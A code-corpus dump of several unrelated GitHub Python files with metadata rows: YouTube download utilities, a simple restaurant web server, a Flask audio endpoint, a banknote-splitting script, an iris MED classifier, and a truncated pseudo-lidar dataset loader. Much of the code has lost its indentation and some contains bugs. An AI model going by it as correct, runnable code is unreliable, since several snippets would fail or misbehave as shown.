search = Search(query)
for result in search.results:
video = {}
video['video_id'] = result.video_id
video['title'] = result.title
video['url'] = result.watch_url
video['thumbnail'] = YouTube(result.watch_url).thumbnail_url
videos.append(video)
return videos
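# A minimal usage sketch (illustrative, assumes network access for pytube):
# videos = fetch_videos('tiesto')
# videos[0].keys()  -> dict_keys(['video_id', 'title', 'url', 'thumbnail'])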
def create_folders(video: bool = True):
    # build <Downloads>/DJStudio/<VIDEO|MP3>, creating folders as needed
    sub_folder = 'VIDEO' if video else 'MP3'
    path_to_file = os.path.join(DOWNLOAD_PATH, 'DJStudio', sub_folder)
    if not os.path.exists(path_to_file):
        os.makedirs(path_to_file)
        print(f'Created path: {path_to_file}', end='\n')
    return path_to_file
def download_video(video_id):
status = 'pending'
path_to_file = create_folders(video=True)
link=f"https://www.youtube.com/watch?v={video_id}"
try:
yt = YouTube(link)
    except:
        print("Connection Error")
        return 'rejected'  # yt is unbound past this point
try:
yt.streams.filter(progressive=True, file_extension="mp4").first().download(output_path=path_to_file)
status = 'approved'
except:
print("Some Error!")
status = 'rejected'
return status
def download_mp3(video_id):
status = 'pending'
video = f'https://www.youtube.com/watch?v={video_id}'
path_to_file = create_folders(video=False)
try:
audio_title = YouTube(video).title
audio_mp4 = YouTube(video).streams.filter(only_audio=True).first().download(output_path=path_to_file)
log = f' Downloaded: {audio_title}'
status = 'approved'
    except:
        log = f'Error: {video}'  # audio_title may be unbound if YouTube() failed
        status = 'rejected'
        return status
try :
base, ext = os.path.splitext(audio_mp4)
to_mp3 = base + '.mp3'
os.rename(audio_mp4, to_mp3)
except FileExistsError:
os.remove(to_mp3)
os.rename(audio_mp4, to_mp3)
log = log.replace('Downloaded', 'Already exists')
return status
def download_mp3_from_file(file):
df_videos = pd.read_excel(file)
column = df_videos.columns[0]
videos = df_videos[column].str.strip().tolist()
path_to_file = create_folders(video=False)
logs = []
for idx, video in enumerate(iterable=videos, start=1):
try:
audio_title = YouTube(video).title
audio_mp4 = YouTube(video).streams.filter(only_audio=True).first().download(output_path=path_to_file)
log = [idx, 'Downloaded', audio_title]
        except:
            log = [idx, 'Error', video]  # audio_title may be unbound on failure
            print(log[0], log[1], log[2])
            logs.append(log)
            continue
try :
base, ext = os.path.splitext(audio_mp4)
to_mp3 = base + '.mp3'
os.rename(audio_mp4, to_mp3)
except FileExistsError:
os.remove(to_mp3)
os.rename(audio_mp4, to_mp3)
log[1] = 'Already exists'
print(log[0], log[1], log[2])
logs.append(log)
return logs
def fetch_playlist(user_email):
user_playlist = Playlist.objects.all().filter(user_email=user_email)
playlist_serializer = PlaylistSerializer(user_playlist, many=True)
print('fetch_playlist: ', playlist_serializer.data)
return playlist_serializer.data
def add_to_playlist(video):
status = 'pending'
playlist_serializer = PlaylistSerializer(data=video)
if playlist_serializer.is_valid():
playlist_serializer.save()
status = 'approved'
else:
status = 'rejected'
return status
def delete_from_playlist(video_id, user_email):
status='pending'
try:
record = Playlist.objects.all().filter(video_id=video_id, user_email=user_email)
record.delete()
status = 'approved'
except Exception as e:
print(e)
status = 'rejected'
return status
def save_contact_message(contact_email, user_message, contact_date):
status = 'pending'
    contact_serializer = ContactSerializer(data={'contact_email': contact_email, 'user_message': user_message, 'contact_date': contact_date})
if contact_serializer.is_valid():
contact_serializer.save()
status = 'approved'
else:
status = 'rejected'
return status
|
nikavgeros/DJ-Studio
|
backend/dj_studio/utils.py
|
utils.py
|
py
| 9,608 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21217863407
|
import cgi
from http.server import BaseHTTPRequestHandler,HTTPServer
from db_setup import Base,Restaurant,MenuItem
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
engine = create_engine('sqlite:///restaurantmenu.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
class webserverHandler(BaseHTTPRequestHandler):
def do_GET(self):
try:
if self.path.endswith("/restaurant"):
self.send_response(200)
self.send_header('content-type','text/html')
self.end_headers()
output=""
output +='<html><body><h1><a href="/restaurant/new">Create a new Restaurant</a></h2>'
output +='<h2>Restaurants List</h2>'
listOfRes = session.query(Restaurant).all()
for restaurant in listOfRes:
output+='<h3>%s</h3>' %(restaurant.name)
output+= '<br>'
editLink = "/restaurant/%s/edit" %(restaurant.id)
output+= '<a href="%s">Edit</a>' %(editLink)
output+='<br>'
deleteLink = "/restaurant/%s/delete" % restaurant.id
output+='<a href="%s">Delete</a>' % deleteLink
output += "</body></html>"
self.wfile.write(bytes(output,"UTF-8"))
return
if self.path.endswith("/delete"):
restaurantId=self.path.split("/")[2]
getResById = session.query(Restaurant).filter_by(id=restaurantId).one()
if(getResById != []):
self.send_response(200)
self.send_header('content-type', 'text/html')
self.end_headers()
output = ""
output += "<html><body>"
output += "<h2>Do you want to delete this Restaurant?</h2>"
output += "<form method='POST' enctype='multipart/form-data' action='/restaurant/%s/delete'>" \
"<input type='submit' value='Delete'></form>" % restaurantId
output += "</body></html>"
self.wfile.write(bytes(output,"utf-8"))
return
if self.path.endswith("/edit"):
restaurantId=self.path.split("/")[2]
getNameById = session.query(Restaurant).filter_by(id=restaurantId).one()
if(getNameById != []):
self.send_response(200)
self.send_header('content-type', 'text/html')
self.end_headers()
output=""
output+="<html><body>"
output+="<h2>%s</h2>" %(getNameById.name)
output+= "<form method='POST' enctype='multipart/form-data' action='/restaurant/%s/edit'>" \
"<input name='editedName' placeholder='Enter New Name' type='text'>" \
"<input type='submit' value='Rename'></form>" %(restaurantId)
output+="</body></html>"
self.wfile.write(bytes(output,"utf-8"))
return
if self.path.endswith("/restaurant/new"):
self.send_response(200)
self.send_header('content-type','text/html')
self.end_headers()
output=""
output += '<html><body>'
output += "<form method='POST' enctype='multipart/form-data' action='/restaurant/new'><h1>Make a New Restaurant</h1>" \
"<input name='nameOfRes' type='text'><input type='submit' value='Create'></form>"
output += "</body></html>"
self.wfile.write(bytes(output,"UTF-8"))
return
if self.path.endswith("/hello"):
self.send_response(200)
self.send_header('content-type','text/html')
self.end_headers()
output=""
output=output+'<html><body><h1>Hello!</h1></body></html>'
output += "<form method='POST' enctype='multipart/form-data' action='/hello'><h2>what would like me to say?</h2>" \
"<input name='message' type='text'><input type='submit' value='Submit'></form>"
output += "</body></html>"
self.wfile.write(bytes(output,"UTF-8"))
print(output)
return
except IOError:
self.send_error(404,"FILE NOT FOUND %s" % self.path)
def do_POST(self):
try:
if self.path.endswith("/delete"):
restaurantId = self.path.split("/")[2]
deleteRes = session.query(Restaurant).filter_by(id=restaurantId).one()
if(deleteRes != []):
session.delete(deleteRes)
session.commit()
self.send_response(301)
self.send_header('Content-type', 'text/html')
self.send_header('Location', '/restaurant')
self.end_headers()
return
if self.path.endswith("/edit") :
restaurantId = self.path.split("/")[2]
ctype,pdict = cgi.parse_header(self.headers.get('content-type'))
pdict['boundary'] = bytes(pdict['boundary'],"utf-8")
fields=""
if(ctype=='multipart/form-data'):
fields = cgi.parse_multipart(self.rfile,pdict)
newName = fields.get('editedName')
newName = newName[0].decode("utf-8")
rename = session.query(Restaurant).filter_by(id=restaurantId).one()
if rename != []:
rename.name = newName
session.add(rename)
session.commit()
self.send_response(301)
self.send_header('Content-type', 'text/html')
self.send_header('Location', '/restaurant')
self.end_headers()
if(self.path.endswith("/restaurant/new")):
ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
pdict['boundary'] = bytes(pdict['boundary'], "UTF-8")
if (ctype == 'multipart/form-data'):
fields = cgi.parse_multipart(self.rfile, pdict)
nameOfRes = fields.get('nameOfRes')
ResToDb = Restaurant(name=nameOfRes[0].decode("utf-8"))
session.add(ResToDb)
session.commit()
self.send_response(301)
self.send_header('Content-type', 'text/html')
self.send_header('Location','/restaurant')
self.end_headers()
print("Output OK")
return
# output += "<h2>Okay,how about this:</h2>"
# output += "<h1>"
# self.wfile.write(bytes(output,"utf-8"))
# self.wfile.write(nameOfRes[0])
# output += ""
# output +=" </h1>"
# output += '''<form method='POST' enctype='multipart/form-data' action='/hello'><h2>What would you like me to say?</h2>
# <input name="message" type="text" ><input type="submit" value="Submit"> </form>'''
except:
pass
def main():
try:
port = 8080
server = HTTPServer(('',port),webserverHandler)
print(("web server running on port %s" % port))
server.serve_forever()
except KeyboardInterrupt:
print("^C entered, stopping web server...")
server.socket.close()
if __name__=='__main__':
main()
|
SelbayevAlmas/fullstack_foundations_example
|
myserver.py
|
myserver.py
|
py
| 7,756 |
python
|
en
|
code
| 1 |
github-code
|
6
|
20573212978
|
from flask import Flask, send_file
app = Flask(__name__)
from tools.sound_file_generator import sound_generator
from tools.interval import Interval
@app.route("/")
def index():
return "MusicApp is active"
@app.route("/audiofile/<note>")
def get_note_sound(note):
generator = sound_generator()
sound_url = generator.get_sound_url(note)
return send_file(sound_url)
@app.route("/intervals/<root>/<interval>/<category>")
def get_interval_sound(root,interval,category):
"""Get the interval parameters and returns an audio file
in -> string Root Note, string Interval, string category "Melodic" or "Harmonic"
out -> void """
generator = Interval()
interval_url = generator.get_interval_audio_url(root,interval,category)
return send_file(interval_url)
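# A minimal usage sketch (illustrative values): with the server running locally,
# GET http://127.0.0.1:5000/intervals/C4/third/Melodic
# should respond with the generated audio file for that interval.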
if __name__ == "__main__":
app.run()
|
DanieleSpera/EarTraningAPI
|
__init__.py
|
__init__.py
|
py
| 822 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16021103449
|
'''
Testing what I have already seen in Python with just one program
'''
class NuBankNextWithLepra:
fish = 100.00
cashFish = 0
tiger = 50.00
cashTiger = 0
monkey = 20.00
cashMonkey = 0
bird = 10.00
cashBird = 0
birdWithLongFeet = 5.00
cashBirdWithLongFeet = 0
turtle = 2.00
cashTurtle = 0
woman = 1.00
cashWoman = 0
cashBank = 1050.00
noCash = 0.0
takeMoney = 0.0
options = ['Saque', 'Deposito']
    option = input(f'What do you wanna do: {options[0]} or {options[1]}? ')
if option == options[0]:
money = float(input('How much do you wanna take?'))
if money > cashBank:
print(f'You dont have soo much money, you have {cashBank}')
else:
cashBank = cashBank - money
while money != noCash:
                while (money / fish) >= 1:
                    money = money - fish
                    takeMoney = takeMoney + fish
                    cashFish = cashFish + 1
                while (money / tiger) >= 1:
                    money = money - tiger
                    takeMoney = takeMoney + tiger
                    cashTiger = cashTiger + 1
                while (money / monkey) >= 1:
                    money = money - monkey
                    takeMoney = takeMoney + monkey
                    cashMonkey = cashMonkey + 1
                while (money / bird) >= 1:
                    money = money - bird
                    takeMoney = takeMoney + bird
                    cashBird = cashBird + 1
                while (money / birdWithLongFeet) >= 1:
                    money = money - birdWithLongFeet
                    takeMoney = takeMoney + birdWithLongFeet
                    cashBirdWithLongFeet = cashBirdWithLongFeet + 1
                while (money / turtle) >= 1:
                    money = money - turtle
                    takeMoney = takeMoney + turtle
                    cashTurtle = cashTurtle + 1
                while (money / woman) >= 1:
                    money = money - woman
                    takeMoney = takeMoney + woman
                    cashWoman = cashWoman + 1
print(f'Now you have {cashBank} in your account')
print(f' R$:{cashFish*100}, R$:{cashTiger*50}, R$:{cashMonkey*20}, R$:{cashBird*10}, R$:{cashBirdWithLongFeet*5}, R$:{cashTurtle*2}, R$:{cashWoman*1}')
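# A minimal sketch of the same greedy note split using divmod, assuming integer
# cents to sidestep float drift; denominations mirror the class attributes above.
# Illustration only.
def split_notes(amount_cents):
    counts = {}
    for note in (10000, 5000, 2000, 1000, 500, 200, 100):  # R$100 ... R$1 in cents
        counts[note], amount_cents = divmod(amount_cents, note)
    return counts, amount_cents  # note counts and leftover cents, if any

# e.g. split_notes(18700) -> one each of R$100, R$50, R$20, R$10, R$5, R$2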
|
Renanas-zz/Python-Scripts
|
bancoComLepra.py
|
bancoComLepra.py
|
py
| 2,349 |
python
|
en
|
code
| 0 |
github-code
|
6
|
1706295460
|
import numpy as np
from sklearn import datasets
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
# MED (minimum Euclidean distance) classifier
class Medclass:
    def __init__(self):
        self.center_dict = {}  # class center points, keyed by label -> center_point (list)
        self.feature_number = 0  # feature dimensionality
        self.train_state = False  # training state: True once trained, False if not trained yet
def train(self, feature_set, label_set):
        new_label_set = {key: value for key, value in enumerate(label_set)}  # convert labels to a dict keyed by index -> label
        self.feature_number = len(feature_set[0])
        sample_num = len(label_set)  # number of samples
        count = {}  # number of samples per class, label -> count (int)
        # compute the center point of each class
        for index in range(sample_num):
            if new_label_set[index] not in count.keys():
                count[new_label_set[index]] = 1  # first sample of this label (was 0, which undercounted)
            else:
                count[new_label_set[index]] += 1  # count samples with this label
if new_label_set[index] not in self.center_dict.keys():
self.center_dict[new_label_set[index]] = feature_set[index]
else:
self.center_dict[new_label_set[index]] += feature_set[index]
for _key_ in self.center_dict.keys():
for _feature_ in range(self.feature_number):
self.center_dict[_key_][_feature_] /= count[_key_]
self.train_state = True
    # predict classes for the input; returns a dict of index -> predicted label pairs
def predict(self, feature_set):
# 先判断此分类器是否经过训练
if not self.train_state:
return {}
sample_num = len(feature_set)
        distance_to = {}  # squared distance from a sample to each class center, label -> float
        result = {}  # classification results, index -> label
for _sample_ in range(sample_num):
for _key_ in self.center_dict.keys():
delta = feature_set[_sample_] - self.center_dict[_key_]
distance_to[_key_] = np.dot(delta.T, delta)
            result[_sample_] = min(distance_to, key=distance_to.get)  # key (label) with the minimum distance
return result
    # compute prediction accuracy
def accuracy(self, feature_set, label_set):
if not self.train_state:
return 0.0
correct_num = 0
total_num = len(label_set)
predict = self.predict(feature_set)
for _sample_ in range(total_num):
if predict[_sample_] == label_set[_sample_]:
correct_num += 1
return correct_num / total_num
    # given the designated positive class, compute the classifier's performance metrics
    # (accuracy, precision, recall, specificity, F1_Score)
def performance(self, feature_set, label_set, positive):
if not self.train_state:
return {}
total_num = len(label_set)
predict = self.predict(feature_set)
true_positive, false_positive, true_negative, false_negative = 0, 0, 0, 0
for _sample_ in range(total_num):
if predict[_sample_] == label_set[_sample_]:
if label_set[_sample_] == positive:
true_positive += 1
else:
true_negative += 1
else:
if label_set[_sample_] == positive:
false_negative += 1
else:
false_positive += 1
print("tp=",true_positive,"tn=",true_negative,"fn=",false_negative,"fp=",false_positive)
        accuracy = (true_positive + true_negative) / total_num  # accuracy (correctly predicted samples / total samples)
        precision = true_positive / (true_positive + false_positive)  # precision (fraction of predicted positives that are truly positive)
        recall = true_positive / (true_positive + false_negative)  # recall (fraction of true positives predicted as positive)
        specificity = true_negative / (true_negative + false_positive)  # specificity (fraction of true negatives predicted as negative)
        F1_Score = (2 * precision * recall) / (precision + recall)  # harmonic mean of precision and recall
print("accuracy:", accuracy, "precision:", precision, "recall:", recall, "specificity:",specificity, "F1_Score:", F1_Score)
    # get the center point of one class
def get_center(self, key):
if key in self.center_dict.keys():
return self.center_dict[key]
else:
return []
def get_center_dict(self):
return self.center_dict
# end
# decision-line plotting
# show the decision line of a binary classification problem (class_1 vs class_2) in the 2D plane
# feature is the sample feature set, label the corresponding labels; every pair of feature dimensions is compared, n is the number of feature dimensions
def show_decision_line(feature, label, med_classifier, class_1=0, class_2=0, n=0):
    plt.figure(figsize=(16, 12), dpi=80)  # overall canvas size and resolution
img = [[] for i in range(n * n)]
for i in range(n):
for j in range(n):
img[i * n + j] = plt.subplot(n, n, i * n + j + 1)
center_1 = med_classifier.get_center(class_1)
center_2 = med_classifier.get_center(class_2)
            c_1 = [center_1[i], center_1[j]]  # components i, j of the class_1 center
            c_2 = [center_2[i], center_2[j]]  # components i, j of the class_2 center
            center_3 = [(c_1[0] + c_2[0]) / 2, (c_1[1] + c_2[1]) / 2]  # midpoint of the segment joining the two centers
            k2, b2 = calculate_vertical_line(c_1, c_2)  # slope and intercept of the perpendicular bisector
            plt.scatter(feature[:, i], feature[:, j], c=label, s=20, marker='.')  # scatter plot of the sample set on features i and j
            plt.scatter(c_1[0], c_1[1], c='b', marker='x')  # show the centers computed by the MED classifier
plt.scatter(c_2[0], c_2[1], c='b', marker='x')
            plt.grid(True)  # show grid lines
            plt.axis('equal')  # equal spacing on both axes
plt.axline(c_1, c_2, color='c', linestyle="--", label="connected line")
plt.axline(center_3, slope=k2, color='r', label="decision line")
if i == j:
                plt.legend()  # show the legend on the diagonal subplots
plt.xlabel("feature " + str(i))
plt.ylabel("feature " + str(j))
    plt.tight_layout()  # auto-adjust subplot sizes to reduce mutual occlusion
plt.show()
# line through two points; returns slope and y-intercept (points assumed 2D, given as lists)
def calculate_connected_line(point_1, point_2):
if len(point_1) != 2 or len(point_2) != 2:
return None
k = (point_1[1] - point_2[1]) / (point_1[0] - point_2[0])
b = (point_1[0] * point_2[1] - point_2[0] * point_1[1]) / (point_1[0] - point_2[0])
return k, b
# perpendicular bisector of two points; returns slope and y-intercept (points assumed 2D, given as lists)
def calculate_vertical_line(point_1, point_2):
if len(point_1) != 2 or len(point_2) != 2:
return None
k = -(point_1[0] - point_2[0]) / (point_1[1] - point_2[1])
b = (point_1[1] + point_2[1] + (point_1[0] + point_2[0]) * (point_1[0] - point_2[0]) / (point_1[1] - point_2[1]))/2
return k, b
# end of decision-line plotting
# feature: sample features, label: corresponding labels; m rows by n columns, m*n subplots in total
def visualization(feature, label, m, n):
plt.figure(figsize=(10, 10), dpi=100)
img = [[] for i in range(m*n)]
for i in range(m):
for j in range(n):
img[i*n+j] = plt.subplot(m, n, i*n+j+1)
plt.xlabel("x"+str(i))
plt.ylabel("x"+str(j))
plt.xlim(-1, 9)
plt.ylim(-1, 9)
plt.scatter(feature[:, i], feature[:, j], s=5, c=label, marker='x')
            plt.grid(True)  # show grid lines
    plt.tight_layout()  # auto-adjust subplot sizes to reduce mutual occlusion
plt.show()
# feature: sample features, label: corresponding labels; m rows by n columns, m*n subplots in total
def visualization_white(feature, label, m, n):
plt.figure(figsize=(10, 10), dpi=100)
img = [[] for i in range(m*n)]
for i in range(m):
for j in range(n):
img[i*n+j] = plt.subplot(m, n, i*n+j+1)
plt.xlabel("x"+str(i))
plt.ylabel("x"+str(j))
plt.xlim(-20, 20)
plt.ylim(-20, 20)
plt.scatter(feature[:, i], feature[:, j], s=5, c=label, marker='x')
            plt.grid(True)  # show grid lines
    plt.tight_layout()  # auto-adjust subplot sizes to reduce mutual occlusion
plt.show()
# remove samples of a given class; returns two numpy arrays
def remove_from_data(feature, label, num):
new_feature = []
new_label = []
for index in range(len(label)):
if label[index] != num:
new_feature.append(feature[index])
new_label.append(label[index])
return np.asarray(new_feature), np.asarray(new_label)
# feature whitening; returns the whitened matrix (as a numpy array)
# the argument is a numpy array whose layout is the transpose of the mathematical matrix
def whitening(data):
    Ex = np.cov(data, rowvar=False)  # Ex is the covariance matrix of data
    print(Ex.shape)
    a, b = np.linalg.eig(Ex)  # eigenvalues and eigenvectors of the covariance matrix Ex
    # normalize the eigenvectors (np.linalg.eig returns them as columns; the
    # original row-wise squared sums skipped the square root and used the wrong axis)
    b = np.real(b)
    b = b / np.linalg.norm(b, axis=0)
    # diagonal matrix A = diag(eigenvalues^(-1/2))
    a = np.real(a)
    A = np.diag(a**(-0.5))
    W = np.dot(A, b.transpose())  # whitening matrix W = A @ E^T
    X = np.dot(W, np.dot(Ex, W.transpose()))  # sanity check: W Ex W^T should be near identity
for i in range(W.shape[0]):
for j in range(W.shape[1]):
if np.isnan(W[i][j]):
W[i][j]=0
print(W)
    return np.dot(data, W.transpose())  # rows are samples, so apply W on the right as W^T
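# A minimal sanity-check sketch for whitening(), assuming non-degenerate
# eigenvalues: after whitening, the sample covariance should be close to the
# identity matrix (up to numerical error). Illustration only.
def check_whitening(data):
    white = whitening(data)
    cov = np.cov(white, rowvar=False)
    return np.allclose(cov, np.eye(cov.shape[0]), atol=1e-6)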
if __name__ == '__main__':
iris = datasets.load_iris()
iris_data = iris.data
iris_target = iris.target
iris_target_names=iris.target_names
print(iris)
    # visualization
visualization(iris_data,iris_target,4,4)
    # remove the last class (the linearly non-separable one)
iris_data_linear, iris_target_linear = remove_from_data(iris_data, iris_target, 2)
visualization(iris_data_linear,iris_target_linear,4,4)
    # split into training and test sets
x_train, x_test, y_train, y_test = train_test_split(iris_data_linear, iris_target_linear, test_size=0.3)
meds=Medclass()
meds.train(x_train,y_train)
meds.performance(x_test, y_test, 0)
    # show pairwise feature comparison plots with the decision line
show_decision_line(x_test, y_test, meds, class_1=0, class_2=1, n=4)
    # feature whitening
iris_data_white = whitening(iris_data)
print(iris_data_white)
visualization_white(iris_data_white,iris_target,4,4)
    # remove the linearly separable class
    #iris_data_nolinear, iris_target_nolinear = remove_from_data(iris_data, iris_target, 0)  # without whitening
    #visualization(iris_data_nolinear,iris_target_nolinear,4,4)
    iris_data_nolinear, iris_target_nolinear = remove_from_data(iris_data_white, iris_target, 0)  # with whitening
visualization_white(iris_data_nolinear,iris_target_nolinear,4,4)
    # split into training and test sets
x_train, x_test, y_train, y_test = train_test_split(iris_data_nolinear, iris_target_nolinear, test_size=0.3)
meds2=Medclass()
meds2.train(x_train,y_train)
meds2.performance(x_test, y_test, 1)
    # show pairwise feature comparison plots with the decision line
show_decision_line(x_test, y_test, meds2, class_1=1, class_2=2, n=4)
|
suudeer/iris-su2021
|
iris-su2021/iris/main.py
|
main.py
|
py
| 11,704 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26447487026
|
import os
import json
from PIL import Image
import numpy as np
from numpy.core.numeric import full
import torch
from torch.utils.data import Dataset
from tqdm import tqdm
import sys
from pcl_generator import PointCloudGenerator
from lidar_generator import PseudoLidarGenerator
def load_pose(extrinsics: dict) -> np.array:
"""
Load pose as 4x4 matrix from (x, y, z, yaw)
:param extrinsics: Dictionary with extrinsic parameters x, y, z and yaw angle.
:return T: 4x4 transformation matrix as numpy array
"""
sinval = np.sin(extrinsics['yaw'] * np.pi / 180.)
cosval = np.cos(extrinsics['yaw'] * np.pi / 180.)
Rz = np.array([[cosval, -sinval, 0],
[sinval, cosval, 0],
[0, 0, 1]])
t = np.array([extrinsics['x'], extrinsics['y'], extrinsics['z']])
T = np.eye(4)
T[:3, :3] = Rz
T[:3, 3] = Rz @ t
return T
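# A minimal usage sketch (hypothetical extrinsics, hypothetical helper name):
# with a 90-degree yaw and a 1 m x-offset, the translation is rotated into the
# world frame, so the sensor origin in homogeneous coordinates lands at
# roughly (0, 1, 0).
def _load_pose_example():
    T = load_pose({'x': 1.0, 'y': 0.0, 'z': 0.0, 'yaw': 90.0})
    origin = np.array([0.0, 0.0, 0.0, 1.0])  # sensor-frame origin
    return T @ origin  # ~ [0., 1., 0., 1.]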
class PseudoLidarData(Dataset):
"""
Adapted from https://github.com/autonomousvision/transfuser/blob/main/transfuser/data.py
"""
def __init__(self, root, config):
self.seq_len = config.seq_len
self.pred_len = config.pred_len
self.ignore_sides = config.ignore_sides
self.ignore_rear = config.ignore_rear
self.input_resolution = config.input_resolution
self.scale = config.scale
with open('pseudolidar/extrinsics.json', mode='r') as f:
extrinsics = json.load(f)
self.front_pose = load_pose(extrinsics['cam_front'])
self.left_pose = load_pose(extrinsics['cam_left'])
self.right_pose = load_pose(extrinsics['cam_right'])
self.rear_pose = load_pose(extrinsics['cam_rear'])
self.img_dims = config.image_dim
self.img_fov = config.fov
self.pc_generator = PointCloudGenerator(self.img_fov, self.img_dims)
self.lidar_generator = PseudoLidarGenerator([self.front_pose,
self.left_pose,
self.right_pose,
self.rear_pose])
self.lidar = []
self.front = []
self.left = []
self.right = []
self.rear = []
self.depth_front = []
self.depth_left = []
self.depth_right = []
self.depth_rear = []
self.x = []
self.y = []
self.x_command = []
self.y_command = []
self.theta = []
self.steer = []
self.throttle = []
self.brake = []
self.command = []
self.velocity = []
for sub_root in tqdm(root, file=sys.stdout):
preload_file = os.path.join(sub_root, 'pseudo_lidar_diag_pl_' +
str(self.seq_len)+'_'+str(self.pred_len)+'.npy')
# dump to npy if no preload
if not os.path.exists(preload_file):
preload_front = []
preload_left = []
preload_right = []
preload_rear = []
preload_lidar = []
preload_depth_front = []
preload_depth_left = []
preload_depth_right = []
preload_depth_rear = []
preload_x = []
preload_y = []
preload_x_command = []
preload_y_command = []
preload_theta = []
preload_steer = []
preload_throttle = []
preload_brake = []
preload_command = []
preload_velocity = []
# list sub-directories in root
root_files = os.listdir(sub_root)
routes = [folder for folder in root_files if not os.path.isfile(os.path.join(sub_root, folder))]
for route in routes:
route_dir = os.path.join(sub_root, route)
# subtract final frames (pred_len) since there are no future waypoints
# first frame of sequence not used
num_seq = (len(os.listdir(route_dir+"/rgb_front/"))-self.pred_len-2)//self.seq_len
for seq in range(num_seq):
fronts = []
lefts = []
rights = []
rears = []
lidars = []
depth_fronts = []
depth_lefts = []
depth_rights = []
depth_rears = []
xs = []
ys = []
thetas = []
# read files sequentially (past and current frames)
for i in range(self.seq_len):
# images
filename = f"{str(seq*self.seq_len+1+i).zfill(4)}.png"
fronts.append(route_dir+"/rgb_front/"+filename)
lefts.append(route_dir+"/rgb_left/"+filename)
rights.append(route_dir+"/rgb_right/"+filename)
rears.append(route_dir+"/rgb_rear/"+filename)
# point cloud
lidars.append(route_dir + f"/lidar/{str(seq*self.seq_len+1+i).zfill(4)}.npy")
depth_fronts.append(route_dir + f"/depth_front/{str(seq*self.seq_len+1+i).zfill(4)}.png")
depth_lefts.append(route_dir + f"/depth_left/{str(seq*self.seq_len+1+i).zfill(4)}.png")
depth_rights.append(route_dir + f"/depth_right/{str(seq*self.seq_len+1+i).zfill(4)}.png")
depth_rears.append(route_dir + f"/depth_rear/{str(seq*self.seq_len+1+i).zfill(4)}.png")
# position
with open(route_dir + f"/measurements/{str(seq*self.seq_len+1+i).zfill(4)}.json", "r") as read_file:
data = json.load(read_file)
xs.append(data['x'])
ys.append(data['y'])
thetas.append(data['theta'])
# get control value of final frame in sequence
preload_x_command.append(data['x_command'])
preload_y_command.append(data['y_command'])
preload_steer.append(data['steer'])
preload_throttle.append(data['throttle'])
preload_brake.append(data['brake'])
preload_command.append(data['command'])
preload_velocity.append(data['speed'])
# read files sequentially (future frames)
for i in range(self.seq_len, self.seq_len + self.pred_len):
# point cloud
lidars.append(route_dir + f"/lidar/{str(seq*self.seq_len+1+i).zfill(4)}.npy")
depth_fronts.append(route_dir + f"/depth_front/{str(seq*self.seq_len+1+i).zfill(4)}.npy")
depth_lefts.append(route_dir + f"/depth_left/{str(seq*self.seq_len+1+i).zfill(4)}.npy")
depth_rights.append(route_dir + f"/depth_right/{str(seq*self.seq_len+1+i).zfill(4)}.npy")
depth_rears.append(route_dir + f"/depth_rear/{str(seq*self.seq_len+1+i).zfill(4)}.npy")
# position
with open(route_dir + f"/measurements/{str(seq*self.seq_len+1+i).zfill(4)}.json", "r") as read_file:
data = json.load(read_file)
xs.append(data['x'])
ys.append(data['y'])
# fix for theta=nan in some measurements
if np.isnan(data['theta']):
thetas.append(0)
else:
thetas.append(data['theta'])
preload_front.append(fronts)
preload_left.append(lefts)
preload_right.append(rights)
preload_rear.append(rears)
preload_lidar.append(lidars)
preload_depth_front.append(depth_fronts)
preload_depth_left.append(depth_lefts)
preload_depth_right.append(depth_rights)
preload_depth_rear.append(depth_rears)
preload_x.append(xs)
preload_y.append(ys)
preload_theta.append(thetas)
# dump to npy
preload_dict = {}
preload_dict['front'] = preload_front
preload_dict['left'] = preload_left
preload_dict['right'] = preload_right
preload_dict['rear'] = preload_rear
preload_dict['lidar'] = preload_lidar
preload_dict['depth_front'] = preload_depth_front
preload_dict['depth_left'] = preload_depth_left
preload_dict['depth_right'] = preload_depth_right
preload_dict['depth_rear'] = preload_depth_rear
preload_dict['x'] = preload_x
preload_dict['y'] = preload_y
preload_dict['x_command'] = preload_x_command
preload_dict['y_command'] = preload_y_command
preload_dict['theta'] = preload_theta
preload_dict['steer'] = preload_steer
preload_dict['throttle'] = preload_throttle
preload_dict['brake'] = preload_brake
preload_dict['command'] = preload_command
preload_dict['velocity'] = preload_velocity
np.save(preload_file, preload_dict)
# load from npy if available
preload_dict = np.load(preload_file, allow_pickle=True)
self.front += preload_dict.item()['front']
self.left += preload_dict.item()['left']
self.right += preload_dict.item()['right']
self.rear += preload_dict.item()['rear']
self.lidar += preload_dict.item()['lidar']
self.depth_front += preload_dict.item()['depth_front']
self.depth_left += preload_dict.item()['depth_left']
self.depth_right += preload_dict.item()['depth_right']
self.depth_rear += preload_dict.item()['depth_rear']
self.x += preload_dict.item()['x']
self.y += preload_dict.item()['y']
self.x_command += preload_dict.item()['x_command']
self.y_command += preload_dict.item()['y_command']
self.theta += preload_dict.item()['theta']
self.steer += preload_dict.item()['steer']
self.throttle += preload_dict.item()['throttle']
self.brake += preload_dict.item()['brake']
self.command += preload_dict.item()['command']
self.velocity += preload_dict.item()['velocity']
print("Preloading " + str(len(preload_dict.item()['front'])) + " sequences from " + preload_file)
def __len__(self):
"""Returns the length of the dataset. """
return len(self.front)
def __getitem__(self, index):
"""Returns the item at index idx. """
data = dict()
data['fronts'] = []
data['lefts'] = []
data['rights'] = []
data['rears'] = []
data['lidars'] = []
seq_fronts = self.front[index]
seq_lefts = self.left[index]
seq_rights = self.right[index]
seq_rears = self.rear[index]
seq_lidars = self.lidar[index]
seq_depth_fronts = self.depth_front[index]
seq_depth_lefts = self.depth_left[index]
seq_depth_rights = self.depth_right[index]
seq_depth_rears = self.depth_rear[index]
seq_x = self.x[index]
seq_y = self.y[index]
seq_theta = self.theta[index]
full_lidar = []
pos = []
neg = []
for i in range(self.seq_len):
data['fronts'].append(torch.from_numpy(np.array(
scale_and_crop_image(Image.open(seq_fronts[i]), scale=self.scale, crop=self.input_resolution))))
if not self.ignore_sides:
data['lefts'].append(torch.from_numpy(np.array(
scale_and_crop_image(Image.open(seq_lefts[i]), scale=self.scale, crop=self.input_resolution))))
data['rights'].append(torch.from_numpy(np.array(
scale_and_crop_image(Image.open(seq_rights[i]), scale=self.scale, crop=self.input_resolution))))
if not self.ignore_rear:
